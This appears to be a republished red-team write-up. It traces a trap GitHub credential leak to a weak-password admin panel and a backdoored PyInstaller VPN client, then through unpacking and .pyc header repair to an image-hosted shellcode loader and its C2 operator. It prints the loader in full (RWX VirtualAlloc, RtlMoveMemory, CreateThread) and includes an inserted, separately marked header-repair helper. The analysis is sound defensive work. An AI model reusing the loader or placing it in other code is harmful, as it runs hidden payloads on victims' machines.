Unmasking a Fake GitHub Leak: From Weak Passwords to a Red Team Backdoor
During a penetration testing exercise, the team discovered a cleverly disguised GitHub repository that leaked credentials. The leak led to a weakly protected admin interface and to a malicious Python-based VPN client; reverse engineering the client with PyInstaller extraction revealed shellcode hidden inside images, which allowed the team to trace the command-and-control server and pinpoint the origin of the intrusion.
During the information-gathering phase of a red-team exercise, a seemingly innocuous GitHub repository was found to contain leaked credentials, which turned out to be a trap set for the red team.
Below is an interesting analysis and tracing process.
0x01 Information Gathering
GitHub Information Leakage
Standard GitHub sensitive-information scanning based on the target's data revealed a repository that was out of the ordinary.
The repository appeared to contain MySQL usernames and passwords, prompting an attempt to connect to the database with Navicat.
After that connection failed, port 8080 on the same host was accessed, revealing a management backend.
Weak Passwords
Trying common credentials on the backend yielded admin/admin, granting access.
Inside the admin panel, usernames, passwords, and even the client‑extraction password were plainly displayed.
Expecting to obtain the VPN client from the panel, the team downloaded the file and examined it.
0x02 Analysis and Tracing
Running the VPN client in a virtual machine showed an incompatibility message, hinting at a Python‑based implementation.
The login request used a query string like admin.php?user=admin&passwd=admin.
Unpacking
The PyInstaller archive was unpacked with pyinstxtractor:
python3 pyinstxtractor.py vpnclient64.exe
This command creates a folder named vpnclient64.exe_extracted containing the unpacked files.
Because PyInstaller strips the first eight bytes (the header) of the .pyc files, the header must be restored manually before they can be decompiled.
Adding Header
Using the extracted struct.py file as a reference, the missing header bytes are re-added to the stripped file.
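An added helper, not from the write-up or from the pyinstxtractor project, that performs the header repair described above: it takes the header from the extracted struct.pyc, checks that its magic matches the running interpreter (marshal's format is version specific), and prepends it to the headerless entry-point .pyc. It handles the 8-byte layout the text describes as well as the 12- and 16-byte layouts of newer interpreters; the file names, sample bytes and the C2 string are constructed placeholders.

```python
import importlib.util
import marshal
import types

# Known pyc header layouts: 8 bytes (magic + mtime, the layout the write-up
# describes), 12 bytes (+ source size, 3.3-3.6), 16 bytes (+ flags, 3.7+).
HEADER_SIZES = (8, 12, 16)


def detect_header_size(reference_pyc):
    """Header length of an intact .pyc (the extracted struct.pyc): the
    first offset at which a code object unmarshals. Heuristic: a wrong
    offset raises or yields a non-code object."""
    for size in HEADER_SIZES:
        try:
            obj = marshal.loads(reference_pyc[size:])
        except (ValueError, EOFError, TypeError):
            continue
        if isinstance(obj, types.CodeType):
            return size
    raise ValueError("no usable pyc header found in reference file")


def restore_header(reference_pyc, headerless_pyc):
    """Prepend the reference file's header to an entry-point .pyc that
    PyInstaller stored without one. The magic must match the running
    interpreter, since marshal's format differs between versions."""
    header = reference_pyc[:detect_header_size(reference_pyc)]
    if header[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("pyc magic %r is not this interpreter's; analyse "
                         "with the Python version the binary was built with"
                         % header[:4])
    return header + headerless_pyc


def load_code(pyc):
    """Unmarshal a repaired .pyc and return its code object so co_names and
    co_consts can be inspected without ever executing it."""
    return marshal.loads(pyc[detect_header_size(pyc):])


def build_sample():
    """Constructed stand-ins for struct.pyc (with header) and the headerless
    easyvpn64.pyc; a 16-byte header is used so it matches modern CPython."""
    header = importlib.util.MAGIC_NUMBER + b"\x00" * 12
    reference = header + marshal.dumps(compile("x = 1", "struct.py", "exec"))
    entry = marshal.dumps(
        compile("C2 = 'cs.example.invalid'", "easyvpn64.py", "exec"))
    return reference, entry
```

Inspecting co_consts and co_names of the repaired entry point is often enough to spot the C2 string or the image URL before any decompiler is involved.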
Source Code
The extracted easyvpn64.py is the backdoor’s main program; it loads shellcode hidden inside an image.
The requests library is used to fetch the image from OSS; the image contains the shellcode loader.
Shellcode Loader
import base64
import ctypes

str = b''  # the encoded payload blob (omitted from the write-up)
# Three decoding layers: ASCII85 -> base64 -> hex -> raw shellcode bytes
sc_base64 = (base64.a85decode(str)).decode('utf-8')
shellcode = bytearray(bytearray.fromhex((base64.b64decode(sc_base64)).decode('utf-8')))
# 64-bit return type so the allocation pointer is not truncated
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: an RWX allocation, a classic detection signal
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
# Run the copied bytes on a new thread and block until it exits
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

From the decoded shellcode the C2 address was extracted: cs.xxx.cn.
Tracing
DNS lookup of the C2 domain yields an IP address that maps to a specific dormitory.
Further investigation links the activity to a Telegram account.
0x03 Summary
During penetration testing, be vigilant against phishing traps; the attacker had already documented the operation.
Reprinted from XianZhi Community – original URL: https://xz.aliyun.com/t/11275 – author: kat
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.
